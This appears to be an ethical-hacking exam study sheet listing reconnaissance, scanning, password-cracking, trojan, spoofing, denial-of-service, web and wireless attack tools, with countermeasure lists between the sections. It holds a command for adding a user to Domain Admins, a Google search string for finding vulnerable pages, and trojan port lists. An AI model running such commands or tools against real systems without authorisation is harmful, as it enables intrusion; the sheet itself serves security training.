Professional Documents
Culture Documents
Tools
Web Searches Organizations Website Job sites News sites and press releases Private websites Private.organizationwebsiteurl.com Members.organizationwebsiteurl.com Customers.organizationwebsiteurl.com ARIN- WhoIs Traceroute (Tracert in windows)- sends ICMP increasing the TTL with each hop TRACERT www.sysedco.com Google Search Archive.org WayBackMachine People.yahoo.com Netcraft.com enumerates DNS Hosts, gives OS Robots.txt- tells pages not to show in searchengine www.eccouncil.org/robots.txt Wikto Spider- grabs directories based on links Googler- searches for keyword within site BackEnd- powerful, attempts to connect to all potential directories for you Wikto- attempts different types of hacks GoogleHacks- attempts Google hacks EmailTrackerPro- tracks email header WebDataExtractor- Extract Data from Website SmartWhois- extract Domain information VisualRoute- traceroute, identifies webserver & firewalls
Countermeasures
SCANNING TOOLS NMAP- port scanning, network mapper, banner grab - Stealth scan (half open) COUNTERMEASURES
Xmas Scan (send all flags, only 793) FIN scan (send only FIN, only 793) NULL scan(no flags set, only 793) IDLE scan (we dont respond) TCP Connect scan (full open, 3 way handshake) Banner Grabbing - Telnet - P0F - HTTPrint - Netcraft website Scanning for Vulnerabilities - Baseline Security Analyzer- scan MS - Bidiblah- linux - SAINT - NESSUS, SAINT, SARA and SATAN Diagram Network - Visio - GFI LANguard War Dialing PING Angry IP Scanner- scans IPs to identify devices, will look for specific ports NMAP- find open ports, OS, gives difficulty of hack, Scan spoof your IP address Microsoft Baseline Security Analyzer- gives a Report of potential security issues HTTP Relay Server ENUMERATION TOOLS Null Sessions- NetBIOS enumeration NS Lookup Command- DNS enumeration LDAP- Active Directory enumeration LDIFDE- Active Directory dump DumpSec- opens a null session, graphical Hienna old, windows NT SuperScan- enumeration PASSWORD CRACKING TOOLS Historic tools Legion NTInfoScan
COUNTERMEASURES Do not use default passwords anywhere Use strong passwords Enforce good password policies
L0phtCrack John the Ripper KerbCrack Cain and Abel SMBRelay pwdump2
OWNER ESCALLATION TOOLS GetAdmin.exe - works with NT4 SP3 and earlier Secret Batch Files Command: net groups Domain Admins User_name/add/domain
TROJANS TOOLS BackOrifice- UDP ports 31337 or 31338 Deep Throat- UDP ports 2140 and 3150 NetBus- TCP ports 12345 and 12346 Whack a Mole- TCP ports 12361 and 12362 NetBus2- TCP port 20034 Girlfriend TCP port 21544 Masters Paradise- TCP ports 3129, 40421, 40422, 40423, and 40426 Tini- port 7777, very small, runs a command prompt, 8k Donald Dick- TCP or SPX (novel) ports 23476 or 23477, client/server NETCAT- opens a command line interface through TCP or UDP ports Datapipe port redirection, for Unix Fpipe- port redirection for windows
COUNTERMEASURES Nortons Antivirus Mcafee Spybot Webroot User Training- most important
ARP, MAC Flooding & DNS Poisoning Tools TOOLS Ettercap- ARP Poisoning(spoofing) Tool, sniffer Cain and Abel- password cracking tool, All Ettercap features Etherflood- MAC flooding SMAC 2.0 modify windows MAC Macof- Linux, like etherflood
Denial of Service TOOLS SMURF SYN Attack Jolt- sends fragmented ICMP that cannot be reassembled HIJACKING TOOLS Juggernaut- linux, hijack sessions based on keywords Hunt- Linux, ARP Spoofing, MAC discovery T-Sight- windows WEB SERVER TOOLS IIS Unicode Attack (folder traversal attack) - IIS v5 and earlier Metasploit- multiple exploits in one, Unix Whisker- automated web application vulnerability Scanner, command line N-Stealth HTTP- like whisker but graphical Webinspect- graphical, over 1500 scans
COUNTERMEASURES Patch management WSUS (windows server update services) Properly configure webservers Dont leave default settings Set policies and maintain it IISLockdownTool URLScan
Shadow Security Scanner- NetBIOS, HTTP, CGI, WInCGI, FTP, DNS, etc SecureIIS- specifically scans IIS Web Apps Google Hacking Database Johnny.hackstuff.com Inurl:custva.asp site: yoursite.com Wikto| Google Hacks Black Widow- web ripping tool
MBSA (Baseline Security Analyzer) Run web server services with least privilege accounts Use firewall Put Web Server in DMZ Rename admin accounts & use strong passwords Disable default websites Disable directory browsing Include legal notices Disable web/remote administration of web server Web Apps Use encryption Parse forms, inputs Dont store passwords
SQL TOOLS SQL Injection Attacks WebGoat- Open Source TomCat WebServer to Used to learn Web Server Attacks WebScarab Project- local proxy SQL2.EXE- UDP buffer overflow port 1434 WIRELESS TOOLS WEP Crack AirCrack- pulls WEP packets onwireless and cracks WEPLab coWPAtty- attacks WPA preshared keys Denial of Service Attacks ASLEAP- EAP attack EAP MD5- only for testing WIPS (wireless intrusion prevention system) Protocol analyzers
COUNTERMEASURES Use input validation Set appropriate permissions Do not run database with a powerful account Limit form utilization attempts
IDS Tools TOOLS Snort BlackIce Defender Cisco Secure IDS Dragon Sensor eTrust Internet Defense Check Point RealSource